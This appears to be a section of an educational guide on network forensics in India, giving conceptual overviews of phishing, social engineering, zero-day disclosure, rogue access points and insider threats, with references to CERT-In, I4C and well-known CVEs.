Which OWASP Top 10 categories are most often seen in Indian e-commerce casework?
What is SSLstrip and does HSTS prevent it?
Why did the Mirai botnet attacks of 2016 change DDoS defence?
How does I4C's 1930 helpline fit into a network forensic case?
Social engineering, phishing, zero-days and the insider threat
Technical attacks ride on top of human ones. Phishing at network scale comes in several shapes. Spear phishing targets a named individual using their context (their boss's writing style, their HR portal's branding). Whaling targets executives. Smishing is phishing over SMS, and on Indian carriers it remains the dominant vector for OTP harvesting and UPI fraud routed through the I4C 1930 helpline. Phishing kit hosting is the network-layer artefact: a kit deployed on a compromised hosting account at a small Indian provider, fronted by a freshly registered look-alike domain on .in or .co.in. The kit collects credentials and POSTs them to a Telegram bot for live operator follow-up. CERT-In's quarterly Phishing Activity Trends advisories list the most-impersonated brands; in 2024-2025 those were SBI, HDFC Bank, Axis Bank, India Post, IRCTC and the Income Tax e-filing portal.
Social engineering without phishing covers pretexting (the attacker calls posing as a vendor or auditor with a story that justifies an information request), baiting (the attacker leaves a USB stick labelled "Payroll 2026" in a parking lot), tailgating (physically following an employee through a secure door), and quid pro quo (the attacker offers help in exchange for a credential). Indian call-centre cybercrime rings, especially the Jamtara cluster operating across Jharkhand and West Bengal, run pretexting and quid pro quo at industrial scale; NCRB's Crime in India annual report consistently ranks Jharkhand among the highest per-capita cyber-fraud districts.
Zero-day exploits are bugs unknown to the vendor, sold or used before a patch exists. Bug bounty platforms (HackerOne, Bugcrowd, YesWeHack, India's own NCIIPC Responsible Vulnerability Disclosure Programme) pay researchers for coordinated disclosure. CVE assignment is the MITRE-coordinated identifier; NVD at NIST publishes the CVSS scores. CISA KEV (Known Exploited Vulnerabilities) is the catalogue of CVEs proven to be actively exploited; as of May 2026 it lists over 1100 entries. The Indian equivalent advisory channel is CERT-In's vulnerability notes (CIVN series). Examples of high-impact recent CVEs: CVE-2021-44228 (Log4Shell, JNDI lookup in Log4j), CVE-2022-0847 (Dirty Pipe, Linux kernel pipe write), CVE-2024-3094 (XZ Utils backdoor in liblzma).
Rogue access points are MITM machinery at the wireless edge; the evil twin is a rogue AP that copies the SSID of a legitimate one to harvest clients, and captive portal abuse serves a fake login portal to harvest credentials. Fuller coverage lives in wireless network attacks across WEP, WPA, WPA2, WPA3 and rogue AP.
Insider threats account for a steady fraction of incidents that CERT-In handles. The Ponemon/DTEX 2023 Cost of Insider Risks Global Report puts the average total annual cost per organisation at 16.2 million USD (up from 15.4 million USD in 2022); the 2024 edition raised that figure to approximately 17.4 million USD; Verizon's 2024 DBIR pegs internal actors at 35% of all breaches. Detection runs on UEBA (User and Entity Behaviour Analytics) inside a SIEM, plus DLP at the egress. The trigger for SFSL involvement is usually an HR-side complaint that leads to a workstation imaging order under the workflow described in the malware forensics topic.